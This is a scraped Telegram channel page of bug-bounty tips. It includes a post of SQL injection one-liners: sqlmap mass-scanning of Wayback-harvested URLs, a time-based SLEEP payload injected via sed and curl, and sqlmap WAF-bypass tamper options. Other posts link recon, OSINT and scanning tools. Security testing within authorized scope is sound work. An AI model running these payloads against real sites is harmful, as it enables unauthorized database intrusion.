Bug bounty Tips
Kanalga Telegram’da o‘tish
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Ko'proq ko'rsatish5 812
Obunachilar
+824 soatlar
+657 kunlar
+39030 kunlar
Postlar arxiv
5 812
Nothing hits a man harder than realising he's growing older with zero progress in his life.
5 812
Read caption 👌👇
🔍 Bug Bounty Recon Tip: One-Liner Commands for SQL Injection
1️⃣ SQLi with sqlmap + waybackurls:
» waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"
•• Explanation:
-- waybackurls: Fetches URLs from the Wayback Machine.
-- grep: Filters URLs with query parameters and specific file types.
-- sort -u: Removes duplicates.
-- sed: Standardizes query parameters.
-- sqlmap: Automates SQL injection testing on filtered URLs.
2️⃣ Time-Based SQLi with waybackurls:
» waybackurls http://test[.]com | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt
» cat urls.txt | sed 's/=/=(CASE%20WHEN%20(888=888)%20THEN%20SLEEP(5)%20ELSE%20888%20END)/g' | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && time curl "{}"'
•• Explanation:
-- Similar steps to the first command for fetching and filtering URLs.
-- sed: Injects a time-based SQL payload.
-- curl: Sends requests to test for time-based SQL injection vulnerabilities.
3️⃣ Bypass WAF:
» sqlmap -r req.txt --risk 3 --level 3 --dbs --tamper=space2comment,space2morehash
•• Explanation:
-- sqlmap: Reads the request from req.txt.
-- --risk and --level: Sets the risk and level for SQL injection tests.
-- --tamper: Uses tamper scripts to bypass web application firewalls (WAFs).
🚀 Enhance your bug bounty toolkit with these powerful SQL injection commands! Which technique will you try first?
"Remember, knowledge is power! 🔍💡 Follow for more bug bounty and ethical hacking tips and tricks, along with informative posts to keep you ahead of the game!
#RedTeam #InfoSec #CyberSecurity #EthicalHacking #KaliLinux #CyberSec #HackerLife #PenTesting #CyberThreats #NetworkSecurity #SecurityResearch #BugBounty #CyberAttack #InfoSecCommunity #HackThePlanet #OffensiveSecurity #ThreatHunting #CyberSkills #CyberAwareness #SecurityTesting #DigitalForensics #CyberProtection #sql
#injection #testing
https://www.instagram.com/p/C-HfLncS8A0/?igsh=MTc4MmM1YmI2Ng==
5 812
⭐️Bash Scripting from Beginner to Pro⭐️
Bash scripting is an important part of process automation in Linux. Scripting helps you write a sequence of commands in a file and then execute them.
This saves you time because you don't have to write certain commands again and again. You can perform daily tasks efficiently and even schedule them for automatic execution. You can also use it in developing unique solutions , automating processes
Posted by @TheGodEye
5 812
🐋Awesome Hackers Search Engines🐋
Online tools for search info about:
- exploit
- vulnerabilities
- people
- emails
- phone numbers
- domains
- certificates
and more.
https://github.com/edoardottt/awesome-hacker-search-engines
5 812
🦋15 BEST INFOMATION GATHERING TOOLS🦋
• Network Map (nmap) - https://github.com/nmap/nmap
•Dracnmap - https://github.com/Screetsec/Dracnmap
•Xerosploit - https://github.com/LionSec/xerosploit
•RED HAWK (All In One Scanning) - https://github.com/Tuhinshubhra/RED_HAWK
•ReconSpider(For All Scaning) - https://github.com/bhavsec/reconspider
•IsItDown (Check Website Down/Up)
Infoga - Email OSINT - https://github.com/m4ll0k/Infoga
•ReconDog - https://github.com/s0md3v/ReconDog
•Striker - https://github.com/s0md3v/Striker
•SecretFinder (like API & etc) - https://github.com/m4ll0k/SecretFinder
•Find Info Using Shodan - https://github.com/m4ll0k/Shodanfy.py
•Port Scanner - rang3r - https://github.com/floriankunushevci/rang3r
•Breacher - https://github.com/s0md3v/Breacher
Posted by @TheGodEye
5 812
Okay guys, 93% soo let's schedule a webinar on Friday. I will update with a link and let me know which target We should try
5 812
API FUZZING LISTS
Out of turn post, a very tasty collection of fuzzing wordlists for the API
Description of this list from the author:
744,000+ endpoints
357,000+ object properties
211,000+ object names
127,000+ query parameters
74,000+ parameter values
35,000+ path parameters
8,300+ headers
5,300+ paths
880+ common ports
5 812
🚀CRLFsuite - CRLF injection scanner 🚀
👉 The most powerful CRLF injection (HTTP Response Splitting) scanner.
🔗 Download : https://github.com/Raghavd3v/CRLFsuite
5 812
Let's leave that here.
Decide a day, and I will try to make a webinar and you guys can also join and let's hunt live on webinar for 1 - 2hrs
5 812
🚨 Depix 👉 It is a free and open-source tool used for image steganography, specifically for extracting hidden data from images.
🔗Download : https://github.com/spipm/Depix
#bugbounty #bugbountytips
5 812
🕵️♂️🔍 Ever wondered how your computer fetches web pages?
Let's take a fun trip to the "World Wide Library" and meet Wendy the Librarian! 📚✨
She'll show you how making a request for a book is just like your computer requesting a webpage.
Dive into this magical story and discover the secrets of request handling! Swipe through to become a web wizard! 🌐✨
.
.
.
.
✔️ Share It with Your Friends.
🔗 CHECKOUT THE LINK IN BIO
🔥 Don’t miss the HIGHLIGHTS
🤔 Any queries? Don’t hesitate to DM.
❤️ LIKE, COMMENT, SHARE and SAVE the post.
👉 Follow us for more cybersecurity tips and tricks!
🌐 Visit us at www.cipherops.xyz
📲 @cipherops.tech
https://www.instagram.com/p/C-ASeR-yRvP/?igsh=MTc4MmM1YmI2Ng==
5 812
I am looking for an admin who can post content and intaract anyone is here and anyone already running a channel also eligible. I will make him a admin but have some terms and conditions.
Endi mavjud! Telegram Tadqiqoti 2025 — yilning asosiy insaytlari 
